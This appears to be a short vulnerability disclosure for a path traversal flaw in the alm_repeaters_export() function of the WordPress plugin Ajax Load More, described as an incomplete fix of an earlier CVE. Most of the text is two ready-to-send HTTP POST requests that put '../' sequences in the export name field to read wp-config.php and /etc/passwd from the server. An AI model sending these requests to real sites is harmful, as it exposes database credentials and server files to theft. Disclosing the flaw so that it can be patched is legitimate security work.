The plugin does not properly validates paths generated with user input in the alm_repeaters_export() function, which could allow high privilege users to read arbitrary files form the server (even when they should not be able to have access to any, for example in multisite setup) This is due to an incomplete fix of CVE-2022-2943
Get arbitrary PHP files, such as wp-config.php
POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config
Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS)
POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: [admin+]
alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd